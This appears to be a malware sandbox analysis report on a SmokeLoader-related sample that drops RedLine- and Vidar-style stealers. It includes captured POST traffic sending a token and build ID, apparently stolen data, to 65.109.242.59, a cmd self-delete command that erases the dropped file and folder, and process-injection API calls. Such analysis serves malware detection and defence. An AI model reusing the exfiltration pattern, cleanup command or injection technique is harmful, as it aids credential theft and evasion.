2024-05-26 08:31:42 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 26 May 2024 08:31:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-05-26 08:31:42 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	49770	65.109.242.59	443	6716	C:\Users\user\AppData\Local\Temp\kat2225.tmp

Timestamp	Bytes transferred	Direction	Data
2024-05-26 08:31:44 UTC	281	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCBAEHCAEGDHJKFHJKFI User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Content-Length: 129597 Connection: Keep-Alive Cache-Control: no-cache
2024-05-26 08:31:44 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 35 37 64 32 37 38 32 30 62 30 37 39 63 62 61 33 64 66 61 61 63 63 38 64 63 62 34 61 61 66 30 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 0d 0a 43 6f 6e 74 Data Ascii: ------FCBAEHCAEGDHJKFHJKFIContent-Disposition: form-data; name="token"057d27820b079cba3dfaacc8dcb4aaf0------FCBAEHCAEGDHJKFHJKFIContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------FCBAEHCAEGDHJKFHJKFICont
2024-05-26 08:31:44 UTC	16355	OUT	Data Raw: 50 58 32 72 6f 4a 35 34 72 57 33 6b 75 4a 6e 43 52 52 4b 58 64 6a 30 41 48 4a 4e 65 56 2b 46 66 46 4e 74 70 2b 71 36 70 71 6c 31 46 2f 6f 2b 70 53 74 4b 35 68 51 73 31 75 51 78 32 68 2b 4d 66 4e 75 39 65 76 58 72 58 7a 56 61 71 6f 54 69 6d 37 48 32 65 42 77 62 78 47 48 72 53 6a 47 37 56 72 65 74 2f 38 41 4c 2f 4c 71 65 72 4f 69 79 49 79 4f 6f 5a 47 47 47 56 68 6b 45 65 68 72 78 66 78 4c 6f 30 66 68 2f 77 41 55 53 32 4e 73 54 39 6b 6c 68 46 78 45 68 4f 64 67 4a 49 49 2b 6d 51 66 30 72 31 62 54 50 45 46 6a 71 74 78 4a 62 51 47 56 4c 69 4e 42 49 30 55 30 5a 52 74 70 36 4d 4d 39 52 39 4b 38 39 2b 49 6e 2f 49 36 51 66 39 67 35 66 2f 52 6a 31 33 59 4b 66 2b 31 55 70 51 66 57 33 2b 61 50 4d 78 6c 4b 55 63 46 69 4b 4e 57 50 32 4c 32 66 64 57 61 66 72 35 39 6e 35 Data Ascii: PX2roJ54rW3kuJnCRRKXdj0AHJNeV+FfFNtp+q6pql1F/o+pStK5hQs1uQx2h+MfNu9evXrXzVaqoTim7H2eBwbxGHrSjG7Vret/8AL/LqerOiyIyOoZGGGVhkEehrxfxLo0fh/wAUS2NsT9klhFxEhOdgJII+mQf0r1bTPEFjqtxJbQGVLiNBI0U0ZRtp6MM9R9K89+In/I6Qf9g5f/Rj13YKf+1UpQfW3+aPMxlKUcFiKNWP2L2fdWafr59n5
2024-05-26 08:31:44 UTC	16355	OUT	Data Raw: 75 69 53 30 50 73 73 42 78 58 52 79 32 70 37 57 6c 48 6e 62 30 61 65 6d 6e 6b 39 65 79 4d 59 61 6a 48 2f 41 4c 58 35 55 48 55 6d 59 37 59 59 32 5a 76 65 72 33 32 4f 33 4a 2f 31 4b 66 6c 55 69 52 52 78 6a 43 49 42 39 42 57 4d 4f 47 36 66 4e 65 55 74 44 33 61 33 69 54 52 35 50 33 57 48 66 4e 35 74 57 2f 42 66 35 45 4e 73 6b 78 47 2b 64 76 6d 50 61 72 46 4c 53 59 72 33 38 50 68 71 65 48 68 79 55 31 5a 48 35 76 6d 65 61 59 6e 4d 38 51 38 52 69 58 64 2f 67 6c 32 53 43 67 55 74 46 62 6e 6e 43 55 55 74 4a 69 69 34 48 6f 65 68 2b 4a 6f 64 54 43 77 54 37 59 72 76 30 37 50 39 50 38 4b 34 35 66 45 4f 70 34 79 74 31 2f 35 44 58 2f 43 73 37 76 6b 55 6c 65 50 51 79 50 42 30 61 6b 35 38 69 6b 70 57 30 61 54 74 76 65 31 2b 35 37 46 66 4f 38 58 57 70 77 68 7a 74 4f 4e 39 Data Ascii: uiS0PssBxXRy2p7WlHnb0aemnk9eyMYajH/ALX5UHUmY7YY2Zver32O3J/1KflUiRRxjCIB9BWMOG6fNeUtD3a3iTR5P3WHfN5tW/Bf5ENskxG+dvmParFLSYr38PhqeHhyU1ZH5vmeaYnM8Q8RiXd/gl2SCgUtFbnnCUUtJii4Hoeh+JodTCwT7Yrv07P9P8K45fEOp4yt1/5DX/Cs7vkUlePQyPB0ak58ikpW0aTtve1+57FfO8XWpwhztON9
2024-05-26 08:31:44 UTC	16355	OUT	Data Raw: 44 44 4c 4d 52 49 77 69 5a 68 4a 32 49 47 4e 6a 48 6b 6a 4f 4f 4d 6b 45 56 6c 32 4f 6e 58 57 6e 77 70 48 39 6a 73 62 72 79 72 70 72 75 41 7a 68 69 62 65 56 73 5a 5a 63 4d 41 66 75 72 77 32 34 66 4b 4f 4f 75 59 4c 66 53 74 53 67 6b 73 4a 47 4d 45 6b 6c 6c 62 33 46 76 47 7a 35 4a 5a 5a 76 4d 4c 6c 75 65 54 2b 39 62 42 34 37 64 61 62 6e 6d 46 76 68 56 2f 38 41 67 66 35 6b 78 70 35 53 72 2b 38 2f 78 37 2f 35 48 54 57 6b 4c 58 39 31 44 46 59 79 52 58 63 63 31 71 62 74 4a 37 64 5a 48 55 78 68 79 68 2b 55 4a 76 4a 33 44 47 41 70 50 34 63 30 79 56 4a 49 4c 79 65 31 6d 51 72 4c 43 77 44 44 42 48 55 5a 42 77 51 43 4f 43 4f 43 41 66 55 56 7a 31 70 70 6c 2f 61 51 57 31 6f 59 62 4f 34 73 59 62 4e 37 4e 37 61 59 4e 74 6d 6a 61 51 79 2f 4d 51 77 49 49 63 67 67 71 51 52 Data Ascii: DDLMRIwiZhJ2IGNjHkjOOMkEVl2OnXWnwpH9jsbryrpruAzhibeVsZZcMAfurw24fKOOuYLfStSgksJGMEkllb3FvGz5JZZvMLlueT+9bB47dabnmFvhV/8Agf5kxp5Sr+8/x7/5HTWkLX91DFYyRXcc1qbtJ7dZHUxhyh+UJvJ3DGApP4c0yVJILye1mQrLCwDDBHUZBwQCOCOCAfUVz1ppl/aQW1oYbO4sYbN7N7aYNtmjaQy/MQwIIcggqQR
2024-05-26 08:31:44 UTC	16355	OUT	Data Raw: 4d 37 64 7a 35 2f 69 4b 2f 74 4b 64 2b 33 36 69 55 55 74 4a 69 76 59 50 6e 41 6f 70 63 55 55 41 4a 53 55 74 46 41 78 4b 55 30 55 6c 41 42 52 52 52 51 41 55 55 55 55 77 43 69 69 69 67 42 4b 4b 57 69 67 59 6c 4a 54 71 53 67 42 4b 4f 31 4c 53 55 41 4a 52 53 30 55 44 47 30 55 74 46 41 43 55 55 74 4a 51 4d 4b 4b 4b 4b 59 43 55 55 55 55 44 43 6b 70 61 44 53 47 4a 53 55 37 74 53 55 77 45 70 4b 64 53 55 44 45 70 44 53 30 55 41 4a 53 47 6e 55 6c 41 49 53 69 6c 6f 70 6a 45 6f 6f 70 63 55 41 4e 4e 46 4c 53 47 67 42 4b 4b 55 69 6b 70 6c 43 55 55 74 4a 69 67 41 35 70 4b 57 69 69 77 44 61 4b 57 6b 4e 4d 59 55 6c 4c 69 69 67 42 74 47 4b 64 51 61 42 33 47 55 55 70 6f 70 6a 45 35 70 4b 64 52 51 46 78 75 4b 50 77 70 31 4a 54 48 63 62 69 6a 46 4c 52 52 5a 41 4e 78 52 69 6e Data Ascii: M7dz5/iK/tKd+36iUUtJivYPnAopcUUAJSUtFAxKU0UlABRRRQAUUUUwCiiigBKKWigYlJTqSgBKO1LSUAJRS0UDG0UtFACUUtJQMKKKKYCUUUUDCkpaDSGJSU7tSUwEpKdSUDEpDS0UAJSGnUlAISilopjEoopcUANNFLSGgBKKUikplCUUtJigA5pKWiiwDaKWkNMYUlLiigBtGKdQaB3GUUpopjE5pKdRQFxuKPwp1JTHcbijFLRRZANxRin
2024-05-26 08:31:44 UTC	16355	OUT	Data Raw: 48 36 64 4b 4f 74 49 65 6c 41 78 4b 4f 70 6f 34 46 47 4f 76 38 41 53 67 5a 32 75 6f 36 61 64 53 51 51 53 79 2f 36 4c 35 67 6c 61 50 61 4f 57 41 49 42 7a 6a 50 41 4a 2f 4d 30 79 47 77 76 62 61 58 7a 49 62 31 54 2b 34 57 33 38 75 57 46 48 6a 61 4e 54 6c 46 5a 57 55 68 74 75 65 43 51 53 4f 31 61 64 46 63 63 38 4c 52 6d 37 79 6a 71 66 4e 30 38 66 69 4b 63 56 47 45 6d 6b 76 38 41 68 7a 45 76 72 44 55 4e 55 6d 4c 58 51 74 55 65 53 32 2b 78 7a 54 51 70 74 38 32 41 4d 47 45 65 7a 4f 78 51 43 6f 78 73 56 66 66 4f 54 54 76 37 48 75 57 43 77 79 33 53 53 57 6f 53 46 44 47 59 6c 79 52 45 47 45 65 54 6a 4a 32 68 6d 48 58 70 67 64 41 4d 62 4e 46 5a 78 77 47 48 58 32 66 4d 32 6e 6d 32 4c 6b 72 4f 66 53 78 51 57 30 75 55 6a 57 33 50 32 4b 53 31 6a 56 6b 6a 57 53 7a 69 5a Data Ascii: H6dKOtIelAxKOpo4FGOv8ASgZ2uo6adSQQSy/6L5glaPaOWAIBzjPAJ/M0yGwvbaXzIb1T+4W38uWFHjaNTlFZWUhtueCQSO1adFcc8LRm7yjqfN08fiKcVGEmkv8AhzEvrDUNUmLXQtUeS2+xzTQpt82AMGEezOxQCoxsVffOTTv7HuWCwy3SSWoSFDGYlyREGEeTjJ2hmHXpgdAMbNFZxwGHX2fM2nm2LkrOfSxQW0uUjW3P2KS1jVkjWSziZ
2024-05-26 08:31:44 UTC	16355	OUT	Data Raw: 39 36 31 2b 6e 2b 51 73 6b 6b 38 75 70 78 72 4a 44 71 6c 68 39 73 6b 32 71 54 39 6d 5a 4e 34 6a 4a 37 4d 7a 66 64 51 31 77 2f 69 61 32 46 70 34 67 75 59 51 35 66 47 30 6c 6d 41 42 4a 4b 67 39 67 42 33 72 30 47 35 75 34 4c 2b 58 77 2f 64 57 30 67 6b 68 6c 75 79 79 4d 4f 34 2b 7a 7a 56 77 76 6a 4c 2f 6b 61 72 7a 36 52 2f 2b 67 4c 58 56 6c 79 74 69 56 70 62 52 2f 6d 65 5a 6e 62 76 67 70 61 33 31 52 67 30 55 55 56 39 45 66 46 42 52 52 52 54 41 30 76 44 33 2f 49 78 61 64 2f 31 38 4a 2f 4f 76 55 62 6e 56 57 68 76 33 73 34 64 4f 75 37 75 52 49 6b 6c 63 77 6d 4d 42 51 78 59 44 37 37 72 7a 38 6a 64 4b 38 75 38 50 2f 38 41 49 77 36 64 2f 77 42 66 43 66 7a 72 30 6f 54 52 57 2f 69 4c 55 70 70 6e 57 4f 4b 4f 77 74 32 64 32 4f 41 41 48 6e 35 72 35 2f 4e 45 6e 58 76 61 Data Ascii: 961+n+Qskk8upxrJDqlh9sk2qT9mZN4jJ7MzfdQ1w/ia2Fp4guYQ5fG0lmABJKg9gB3r0G5u4L+Xw/dW0gkhluyyMO4+zzVwvjL/karz6R/+gLXVlytiVpbR/meZnbvgpa31Rg0UUV9EfFBRRRTA0vD3/Ixad/18J/OvUbnVWhv3s4dOu7uRIklcwmMBQxYD77rz8jdK8u8P/8AIw6d/wBfCfzr0oTRW/iLUppnWOKOwt2d2OAAHn5r5/NEnXva
2024-05-26 08:31:44 UTC	15112	OUT	Data Raw: 4d 4c 4e 62 77 32 38 34 74 57 2b 37 4f 59 6d 38 73 38 34 2b 39 6a 48 58 33 72 74 77 39 4b 6c 68 34 63 73 5a 61 4e 39 54 79 38 5a 69 4b 2b 4d 71 65 30 6e 48 56 4b 32 69 66 54 37 2b 34 32 69 6b 37 55 64 71 36 7a 67 46 70 4b 4b 4b 41 43 69 69 6b 50 53 67 59 74 4a 52 52 51 41 55 55 55 6c 41 42 52 52 52 51 4d 4b 53 6c 70 4b 41 43 69 69 69 67 59 55 6c 42 6f 6f 41 4b 4b 4b 53 67 59 55 55 55 55 41 4a 52 52 52 51 4d 4b 53 67 30 55 41 46 4a 51 61 4b 59 77 70 4b 57 6b 70 41 46 49 61 57 6b 2f 47 6d 4d 4b 4b 4b 4b 41 45 6f 6f 6f 6f 41 53 69 69 69 67 59 47 6b 6f 6f 6f 47 68 4b 4b 4b 4b 42 69 47 69 69 69 67 59 6c 46 46 46 41 43 55 68 70 61 44 54 47 4a 51 61 4b 53 67 59 55 6c 4c 53 55 41 46 4a 53 30 6c 41 77 70 4b 4b 4b 42 6f 53 69 69 6b 4e 41 42 52 52 53 55 46 42 52 52 Data Ascii: MLNbw284tW+7OYm8s84+9jHX3rtw9Klh4csZaN9Ty8ZiK+Mqe0nHVK2ifT7+42ik7Udq6zgFpKKKACiikPSgYtJRRQAUUUlABRRRQMKSlpKACiiigYUlBooAKKKSgYUUUUAJRRRQMKSg0UAFJQaKYwpKWkpAFIaWk/GmMKKKKAEooooASiiigYGkoooGhKKKKBiGiiigYlFFFACUhpaDTGJQaKSgYUlLSUAFJS0lAwpKKKBoSiikNABRRSUFBRR
2024-05-26 08:31:45 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 26 May 2024 08:31:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-05-26 08:31:45 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	49771	65.109.242.59	443	6716	C:\Users\user\AppData\Local\Temp\kat2225.tmp

Timestamp	Bytes transferred	Direction	Data
2024-05-26 08:31:47 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHCFBFBAEBKJKEBGCAEH User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-05-26 08:31:47 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 48 43 46 42 46 42 41 45 42 4b 4a 4b 45 42 47 43 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 35 37 64 32 37 38 32 30 62 30 37 39 63 62 61 33 64 66 61 61 63 63 38 64 63 62 34 61 61 66 30 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 46 42 46 42 41 45 42 4b 4a 4b 45 42 47 43 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 46 42 46 42 41 45 42 4b 4a 4b 45 42 47 43 41 45 48 0d 0a 43 6f 6e 74 Data Ascii: ------EHCFBFBAEBKJKEBGCAEHContent-Disposition: form-data; name="token"057d27820b079cba3dfaacc8dcb4aaf0------EHCFBFBAEBKJKEBGCAEHContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------EHCFBFBAEBKJKEBGCAEHCont
2024-05-26 08:31:47 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 26 May 2024 08:31:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-05-26 08:31:47 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	04:29:50
Start date:	26/05/2024
Path:	C:\Users\user\Desktop\3.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\3.exe"
Imagebase:	0x400000
File size:	239'104 bytes
MD5 hash:	EDA6E5A44657001108351760D2425C80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2056416748.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2056480507.0000000002E71000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2056480507.0000000002E71000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2056438755.0000000002E50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2056438755.0000000002E50000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2056350311.0000000002D4B000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	04:29:56
Start date:	26/05/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff674740000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	04:30:17
Start date:	26/05/2024
Path:	C:\Users\user\AppData\Roaming\rcjjrra
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\rcjjrra
Imagebase:	0x7ff6d64d0000
File size:	239'104 bytes
MD5 hash:	EDA6E5A44657001108351760D2425C80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2319406747.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2319406747.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.2319506605.0000000002EAB000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2319442146.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2319442146.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.2319383367.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 37%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	04:30:27
Start date:	26/05/2024
Path:	C:\Users\user\AppData\Local\Temp\A247.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\A247.exe
Imagebase:	0x400000
File size:	325'120 bytes
MD5 hash:	EA9DD1EAE2E521666D3F06382104EC10
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000003.2678333691.0000000000913000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.2871870285.00000000008AD000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000003.2678080864.0000000000911000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 96%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	04:30:59
Start date:	26/05/2024
Path:	C:\Users\user\AppData\Local\Temp\5358.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\5358.exe
Imagebase:	0x400000
File size:	2'121'216 bytes
MD5 hash:	AC1CC39DC3DF2AB7197EC22259A09E17
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000008.00000002.2673984496.0000000002590000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 00000008.00000002.2673984496.0000000002590000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000008.00000002.2674868300.00000000045B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 00000008.00000002.2674868300.00000000045B0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 00000008.00000002.2674561163.00000000043B9000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000008.00000002.2674561163.00000000042B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.2674561163.00000000042B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	04:31:00
Start date:	26/05/2024
Path:	C:\Users\user\AppData\Local\Temp\kat2225.tmp
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\kat2225.tmp
Imagebase:	0x400000
File size:	881'664 bytes
MD5 hash:	66064DBDB70A5EB15EBF3BF65ABA254B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.3157954757.0000000000572000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 4%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	04:31:05
Start date:	26/05/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6204 -s 1548
Imagebase:	0x110000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	04:31:48
Start date:	26/05/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\kat2225.tmp" & rd /s /q "C:\ProgramData\DGHIECGCBKFH" & exit
Imagebase:	0x430000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	04:31:48
Start date:	26/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	04:31:48
Start date:	26/05/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 10
Imagebase:	0x440000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	7.8%
Dynamic/Decrypted Code Coverage:	44.4%
Signature Coverage:	44.4%
Total number of Nodes:	108
Total number of Limit Nodes:	5

Executed Functions

Function 00401524 Relevance: 10.7, APIs: 7, Instructions: 248
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2055148754.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec0589a186aaf54ab9e34ef1409c0e3bd6669b76e0db207e0b32d8ee79fde39b
Instruction ID: 3423bc01ac4f23736aca193bd8ce0b677c435782841011dc968e413a06447a3e
Opcode Fuzzy Hash: ec0589a186aaf54ab9e34ef1409c0e3bd6669b76e0db207e0b32d8ee79fde39b
Instruction Fuzzy Hash: 4781CFB1500208BFDB209FA1DC89FABBFB8FF85710F10002AF952BA1E0D6759945CB65

Function 00401615 Relevance: 10.7, APIs: 7, Instructions: 204
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7

Memory Dump Source

Source File: 00000000.00000002.2055148754.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 51aea8e4bab5c1fcf6e4467ccf11cb59c1a8cda3da8b4103b7978e3a0cf5edd1
Instruction ID: a4a30113af8e0dba67415144994249baddb0a1b9eea12a3ecfbdd2b7a77b6b5b
Opcode Fuzzy Hash: 51aea8e4bab5c1fcf6e4467ccf11cb59c1a8cda3da8b4103b7978e3a0cf5edd1
Instruction Fuzzy Hash: B16160B0A04204FBEB209F95CC59FAFBBB9FF85700F14012AF912BA1E4D6759941CB65

Function 00401635 Relevance: 10.7, APIs: 7, Instructions: 178
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725

Memory Dump Source

